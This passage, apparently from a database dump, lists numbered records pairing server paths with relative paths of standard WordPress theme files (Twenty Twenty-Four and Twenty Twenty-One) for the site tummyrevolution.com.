ntent/themes/twentytwentyfour/patterns/text-centered-statement-small.php','wp-content/themes/twentytwentyfour/patterns/text-centered-statement-small.php'),(13377,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/text-centered-statement.php','wp-content/themes/twentytwentyfour/patterns/text-centered-statement.php'),(13378,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/text-faq.php','wp-content/themes/twentytwentyfour/patterns/text-faq.php'),(13379,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/text-feature-grid-3-col.php','wp-content/themes/twentytwentyfour/patterns/text-feature-grid-3-col.php'),(13380,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/text-project-details.php','wp-content/themes/twentytwentyfour/patterns/text-project-details.php'),(13381,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/patterns/text-title-left-image-right.php','wp-content/themes/twentytwentyfour/patterns/text-title-left-image-right.php'),(13382,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/readme.txt','wp-content/themes/twentytwentyfour/readme.txt'),(13383,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/screenshot.png','wp-content/themes/twentytwentyfour/screenshot.png'),(13384,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/style.css','wp-content/themes/twentytwentyfour/style.css'),(13385,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/styles/ember.json','wp-content/themes/twentytwentyfour/styles/ember.json'),(13386,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/styles/fossil.json','wp-content/themes/twentytwentyfour/styles/fossil.json'),(13387,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/styles/ice.json','wp-content/themes/twentytwentyfour/styles/ice.json'),(13388,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/styles/maelstrom.json','wp-content/themes/twentytwentyfour/styles/maelstrom.json'),(13389,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/styles/mint.json','wp-content/themes/twentytwentyfour/styles/mint.json'),(13390,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/styles/onyx.json','wp-content/themes/twentytwentyfour/styles/onyx.json'),(13391,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/styles/rust.json','wp-content/themes/twentytwentyfour/styles/rust.json'),(13392,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/templates/404.html','wp-content/themes/twentytwentyfour/templates/404.html'),(13393,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/templates/archive.html','wp-content/themes/twentytwentyfour/templates/archive.html'),(13394,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/templates/home.html','wp-content/themes/twentytwentyfour/templates/home.html'),(13395,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/templates/index.html','wp-content/themes/twentytwentyfour/templates/index.html'),(13396,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/templates/page-no-title.html','wp-content/themes/twentytwentyfour/templates/page-no-title.html'),(13397,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/templates/page-wide.html','wp-content/themes/twentytwentyfour/templates/page-wide.html'),(13398,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/templates/page-with-sidebar.html','wp-content/themes/twentytwentyfour/templates/page-with-sidebar.html'),(13399,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/templates/page.html','wp-content/themes/twentytwentyfour/templates/page.html'),(13400,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/templates/search.html','wp-content/themes/twentytwentyfour/templates/search.html'),(13401,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/templates/single-with-sidebar.html','wp-content/themes/twentytwentyfour/templates/single-with-sidebar.html'),(13402,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/templates/single.html','wp-content/themes/twentytwentyfour/templates/single.html'),(13403,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyfour/theme.json','wp-content/themes/twentytwentyfour/theme.json'),(13404,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/404.php','wp-content/themes/twentytwentyone/404.php'),(13405,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/archive.php','wp-content/themes/twentytwentyone/archive.php'),(13406,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/css/custom-color-overrides.css','wp-content/themes/twentytwentyone/assets/css/custom-color-overrides.css'),(13407,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/css/ie-editor.css','wp-content/themes/twentytwentyone/assets/css/ie-editor.css'),(13408,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/css/ie.css','wp-content/themes/twentytwentyone/assets/css/ie.css'),(13409,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/css/print.css','wp-content/themes/twentytwentyone/assets/css/print.css'),(13410,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/css/style-dark-mode-rtl.css','wp-content/themes/twentytwentyone/assets/css/style-dark-mode-rtl.css'),(13411,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/css/style-dark-mode.css','wp-content/themes/twentytwentyone/assets/css/style-dark-mode.css'),(13412,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/css/style-editor-customizer.css','wp-content/themes/twentytwentyone/assets/css/style-editor-customizer.css'),(13413,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/css/style-editor.css','wp-content/themes/twentytwentyone/assets/css/style-editor.css'),(13414,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/images/Daffodils.jpg','wp-content/themes/twentytwentyone/assets/images/Daffodils.jpg'),(13415,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/images/Reading.jpg','wp-content/themes/twentytwentyone/assets/images/Reading.jpg'),(13416,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/images/in-the-bois-de-boulogne.jpg','wp-content/themes/twentytwentyone/assets/images/in-the-bois-de-boulogne.jpg'),(13417,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/images/playing-in-the-sand.jpg','wp-content/themes/twentytwentyone/assets/images/playing-in-the-sand.jpg'),(13418,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/images/roses-tremieres-hollyhocks-1884.jpg','wp-content/themes/twentytwentyone/assets/images/roses-tremieres-hollyhocks-1884.jpg'),(13419,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/images/self-portrait-1885.jpg','wp-content/themes/twentytwentyone/assets/images/self-portrait-1885.jpg'),(13420,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/images/the-garden-at-bougival-1884.jpg','wp-content/themes/twentytwentyone/assets/images/the-garden-at-bougival-1884.jpg'),(13421,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/images/villa-with-orange-trees-nice.jpg','wp-content/themes/twentytwentyone/assets/images/villa-with-orange-trees-nice.jpg'),(13422,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/images/young-woman-in-mauve.jpg','wp-content/themes/twentytwentyone/assets/images/young-woman-in-mauve.jpg'),(13423,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/js/customize-helpers.js','wp-content/themes/twentytwentyone/assets/js/customize-helpers.js'),(13424,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/js/customize-preview.js','wp-content/themes/twentytwentyone/assets/js/customize-preview.js'),(13425,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/js/customize.js','wp-content/themes/twentytwentyone/assets/js/customize.js'),(13426,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/js/dark-mode-toggler.js','wp-content/themes/twentytwentyone/assets/js/dark-mode-toggler.js'),(13427,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/js/editor-dark-mode-support.js','wp-content/themes/twentytwentyone/assets/js/editor-dark-mode-support.js'),(13428,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/js/editor.js','wp-content/themes/twentytwentyone/assets/js/editor.js'),(13429,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/js/palette-colorpicker.js','wp-content/themes/twentytwentyone/assets/js/palette-colorpicker.js'),(13430,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/js/polyfills.js','wp-content/themes/twentytwentyone/assets/js/polyfills.js'),(13431,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js','wp-content/themes/twentytwentyone/assets/js/primary-navigation.js'),(13432,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js','wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js'),(13433,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/js/skip-link-focus-fix.js','wp-content/themes/twentytwentyone/assets/js/skip-link-focus-fix.js'),(13434,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/01-settings/file-header.scss','wp-content/themes/twentytwentyone/assets/sass/01-settings/file-header.scss'),(13435,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/01-settings/fonts.scss','wp-content/themes/twentytwentyone/assets/sass/01-settings/fonts.scss'),(13436,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/01-settings/global.scss','wp-content/themes/twentytwentyone/assets/sass/01-settings/global.scss'),(13437,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/02-tools/functions.scss','wp-content/themes/twentytwentyone/assets/sass/02-tools/functions.scss'),(13438,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/02-tools/mixins.scss','wp-content/themes/twentytwentyone/assets/sass/02-tools/mixins.scss'),(13439,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/03-generic/breakpoints.scss','wp-content/themes/twentytwentyone/assets/sass/03-generic/breakpoints.scss'),(13440,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/03-generic/clearings.scss','wp-content/themes/twentytwentyone/assets/sass/03-generic/clearings.scss'),(13441,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/03-generic/normalize.scss','wp-content/themes/twentytwentyone/assets/sass/03-generic/normalize.scss'),(13442,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/03-generic/reset.scss','wp-content/themes/twentytwentyone/assets/sass/03-generic/reset.scss'),(13443,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/03-generic/vertical-margins.scss','wp-content/themes/twentytwentyone/assets/sass/03-generic/vertical-margins.scss'),(13444,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/04-elements/blockquote.scss','wp-content/themes/twentytwentyone/assets/sass/04-elements/blockquote.scss'),(13445,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/04-elements/forms-editor.scss','wp-content/themes/twentytwentyone/assets/sass/04-elements/forms-editor.scss'),(13446,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/04-elements/forms.scss','wp-content/themes/twentytwentyone/assets/sass/04-elements/forms.scss'),(13447,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/04-elements/links.scss','wp-content/themes/twentytwentyone/assets/sass/04-elements/links.scss'),(13448,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/04-elements/media.scss','wp-content/themes/twentytwentyone/assets/sass/04-elements/media.scss'),(13449,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/04-elements/misc.scss','wp-content/themes/twentytwentyone/assets/sass/04-elements/misc.scss'),(13450,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/_config.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/_config.scss'),(13451,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/audio/_style.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/audio/_style.scss'),(13452,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/blocks-editor.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/blocks-editor.scss'),(13453,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/blocks.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/blocks.scss'),(13454,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/button/_editor.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/button/_editor.scss'),(13455,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/button/_style.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/button/_style.scss'),(13456,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/code/_editor.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/code/_editor.scss'),(13457,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/code/_style.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/code/_style.scss'),(13458,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/columns/_editor.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/columns/_editor.scss'),(13459,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/columns/_style.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/columns/_style.scss'),(13460,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/cover/_editor.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/cover/_editor.scss'),(13461,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/cover/_style.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/cover/_style.scss'),(13462,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/file/_editor.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/file/_editor.scss'),(13463,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/file/_style.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/file/_style.scss'),(13464,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/gallery/_editor.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/gallery/_editor.scss'),(13465,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/gallery/_style.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/gallery/_style.scss'),(13466,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/group/_editor.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/group/_editor.scss'),(13467,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/group/_style.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/group/_style.scss'),(13468,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/heading/_editor.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/heading/_editor.scss'),(13469,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/heading/_style.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/heading/_style.scss'),(13470,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/html/_editor.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/html/_editor.scss'),(13471,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/image/_editor.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/image/_editor.scss'),(13472,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/image/_style.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/image/_style.scss'),(13473,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-comments/_editor.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-comments/_editor.scss'),(13474,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-comments/_style.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-comments/_style.scss'),(13475,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-posts/_editor.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-posts/_editor.scss'),(13476,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-posts/_style.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-posts/_style.scss'),(13477,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/legacy/_editor.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/legacy/_editor.scss'),(13478,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/legacy/_style.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/legacy/_style.scss'),(13479,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/list/_editor.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/list/_editor.scss'),(13480,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/list/_style.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/list/_style.scss'),(13481,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/media-text/_editor.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/media-text/_editor.scss'),(13482,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/media-text/_style.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/media-text/_style.scss'),(13483,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/navigation/_editor.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/navigation/_editor.scss'),(13484,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/navigation/_style.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/navigation/_style.scss'),(13485,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/paragraph/_editor.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/paragraph/_editor.scss'),(13486,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/paragraph/_style.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/paragraph/_style.scss'),(13487,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/preformatted/_editor.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/preformatted/_editor.scss'),(13488,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/preformatted/_style.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/preformatted/_style.scss'),(13489,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/pullquote/_editor.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/pullquote/_editor.scss'),(13490,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/pullquote/_style.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/pullquote/_style.scss'),(13491,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/query-loop/_editor.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/query-loop/_editor.scss'),(13492,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/query-loop/_style.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/query-loop/_style.scss'),(13493,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/quote/_editor.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/quote/_editor.scss'),(13494,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/quote/_style.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/quote/_style.scss'),(13495,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/rss/_editor.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/rss/_editor.scss'),(13496,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/rss/_style.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/rss/_style.scss'),(13497,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/search/_editor.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/search/_editor.scss'),(13498,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/search/_style.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/search/_style.scss'),(13499,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/separator/_editor.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/separator/_editor.scss'),(13500,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/separator/_style.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/separator/_style.scss'),(13501,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/social-icons/_editor.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/social-icons/_editor.scss'),(13502,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/social-icons/_style.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/social-icons/_style.scss'),(13503,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/table/_editor.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/table/_editor.scss'),(13504,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/table/_style.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/table/_style.scss'),(13505,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/tag-clould/_editor.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/tag-clould/_editor.scss'),(13506,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/tag-clould/_style.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/tag-clould/_style.scss'),(13507,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_editor.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_editor.scss'),(13508,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_font-sizes.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_font-sizes.scss'),(13509,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_style.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_style.scss'),(13510,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/verse/_editor.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/verse/_editor.scss'),(13511,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/verse/_style.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/verse/_style.scss'),(13512,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/video/_style.scss','wp-content/themes/twentytwentyone/assets/sass/05-blocks/video/_style.scss'),(13513,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/06-components/404.scss','wp-content/themes/twentytwentyone/assets/sass/06-components/404.scss'),(13514,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/06-components/archives.scss','wp-content/themes/twentytwentyone/assets/sass/06-components/archives.scss'),(13515,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/06-components/comments.scss','wp-content/themes/twentytwentyone/assets/sass/06-components/comments.scss'),(13516,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/06-components/editor.scss','wp-content/themes/twentytwentyone/assets/sass/06-components/editor.scss'),(13517,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/06-components/entry.scss','wp-content/themes/twentytwentyone/assets/sass/06-components/entry.scss'),(13518,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/06-components/footer-navigation.scss','wp-content/themes/twentytwentyone/assets/sass/06-components/footer-navigation.scss'),(13519,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/06-components/footer.scss','wp-content/themes/twentytwentyone/assets/sass/06-components/footer.scss'),(13520,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/06-components/header.scss','wp-content/themes/twentytwentyone/assets/sass/06-components/header.scss'),(13521,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/06-components/navigation.scss','wp-content/themes/twentytwentyone/assets/sass/06-components/navigation.scss'),(13522,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/06-components/pagination.scss','wp-content/themes/twentytwentyone/assets/sass/06-components/pagination.scss'),(13523,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/06-components/posts-and-pages.scss','wp-content/themes/twentytwentyone/assets/sass/06-components/posts-and-pages.scss'),(13524,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/06-components/search.scss','wp-content/themes/twentytwentyone/assets/sass/06-components/search.scss'),(13525,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/06-components/single.scss','wp-content/themes/twentytwentyone/assets/sass/06-components/single.scss'),(13526,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/06-components/widgets.scss','wp-content/themes/twentytwentyone/assets/sass/06-components/widgets.scss'),(13527,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/07-utilities/a11y.scss','wp-content/themes/twentytwentyone/assets/sass/07-utilities/a11y.scss'),(13528,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/07-utilities/color-palette.scss','wp-content/themes/twentytwentyone/assets/sass/07-utilities/color-palette.scss'),(13529,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/07-utilities/ie.scss','wp-content/themes/twentytwentyone/assets/sass/07-utilities/ie.scss'),(13530,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/07-utilities/measure.scss','wp-content/themes/twentytwentyone/assets/sass/07-utilities/measure.scss'),(13531,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/07-utilities/print.scss','wp-content/themes/twentytwentyone/assets/sass/07-utilities/print.scss'),(13532,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/style-dark-mode.scss','wp-content/themes/twentytwentyone/assets/sass/style-dark-mode.scss'),(13533,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/style-editor.scss','wp-content/themes/twentytwentyone/assets/sass/style-editor.scss'),(13534,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/style.scss','wp-content/themes/twentytwentyone/assets/sass/style.scss'),(13535,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-custom-colors.php','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-custom-colors.php'),(13536,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize-color-control.php','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize-color-control.php'),(13537,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize-notice-control.php','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize-notice-control.php'),(13538,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize.php','wp-content/themes/t